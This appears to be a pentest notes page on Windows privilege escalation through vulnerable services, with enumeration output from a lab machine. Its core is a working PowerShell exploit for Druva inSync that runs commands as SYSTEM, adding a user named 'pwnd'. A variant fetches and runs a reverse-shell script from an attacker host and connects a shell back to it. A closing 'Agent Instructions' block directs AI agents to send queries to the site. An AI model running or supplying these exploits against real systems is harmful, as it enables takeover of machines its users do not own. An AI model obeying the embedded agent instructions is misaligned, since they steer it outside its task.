# Vulnerable Services ## **Enumerating Installed Programs** ```cmd-session C:\htb> wmic product get name Name Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910 Update for Windows 10 for x64-based Systems (KB4023057) Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127 VMware Tools Druva inSync 6.6.3 Microsoft Update Health Tools Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29910 Update for Windows 10 for x64-based Systems (KB4480730) Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127 ``` {% embed url="" %} {% embed url="" %} ### **Enumerating Local Ports** ```cmd-session C:\htb> netstat -ano | findstr 6064 TCP 127.0.0.1:6064 0.0.0.0:0 LISTENING 3324 TCP 127.0.0.1:6064 127.0.0.1:50274 ESTABLISHED 3324 TCP 127.0.0.1:6064 127.0.0.1:50510 TIME_WAIT 0 TCP 127.0.0.1:6064 127.0.0.1:50511 TIME_WAIT 0 TCP 127.0.0.1:50274 127.0.0.1:6064 ESTABLISHED 3860 ``` ### **Enumerating Process ID** ```powershell-session PS C:\htb> get-process -Id 3324 Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 149 10 1512 6748 3324 0 inSyncCPHwnet64 ``` ### **Enumerating Running Service** ```powershell-session PS C:\htb> get-service | ? {$_.DisplayName -like 'Druva*'} Status Name DisplayName ------ ---- ----------- Running inSyncCPHService Druva inSync Client Service ``` ## BlueHammer — Windows Defender 0-Day Privilege Escalation PoC {% embed url="" %} ## RedSun - Windows Defender exploitation {% embed url="" %} ## Druva inSync Windows Client Local Privilege Escalation Example ### Powershell PoC ```powershell $ErrorActionPreference = "Stop" $cmd = "net user pwnd /add" $s = New-Object System.Net.Sockets.Socket( [System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp ) $s.Connect("127.0.0.1", 6064) $header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]") $rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0") $command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd"); $length = [System.BitConverter]::GetBytes($command.Length); $s.Send($header) $s.Send($rpcType) $s.Send($length) $s.Send($command) ``` #### Reverse shell {% embed url="" %} Rename it something simple like `shell.ps1.` Append the following at the bottom of the script file ```shell-session Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443 ``` Modify the `$cmd` variable to get rs ```powershell $cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3:8080/shell.ps1')" ``` ``` $ErrorActionPreference = "Stop" #Modify the $cmd variable in the Druva inSync exploit PoC script to download our PowerShell reverse shell into memory. $cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.4:8080/shell.ps1')" $s = New-Object System.Net.Sockets.Socket( [System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp ) $s.Connect("127.0.0.1", 6064) $header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]") $rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0") $command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd"); $length = [System.BitConverter]::GetBytes($command.Length); $s.Send($header) $s.Send($rpcType) $s.Send($length) $s.Send($command) #changing the IP to match our address and listening port as well Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443 ``` **Catching a SYSTEM Shell** Execute the PoC PowerShell script on the target host after bypassing execution policy {% content-ref url="/pages/yrRcYBoyWutmbNvRlNZq" %} [Bypass Powershell Execution Policy](/0xss0rz/pentest/internal-pentest/bypass-powershell-execution-policy.md) {% endcontent-ref %}
## SysaxAutomation
{% embed url="" %} ## iTunes - CVE-2024-44193 iTunes version 12.13.2.3 {% embed url="" %} ## Teamviewer {% content-ref url="/pages/17IR6WObDAhId7yjui2U" %} [TeamViewer](/0xss0rz/pentest/public-exploit/teamviewer.md) {% endcontent-ref %} ## AnyDesk Before v9.0.1. {% content-ref url="/pages/1dZVU4M55VxNoGMuNMem" %} [AnyDesk](/0xss0rz/pentest/public-exploit/anydesk.md) {% endcontent-ref %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/vulnerable-services.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.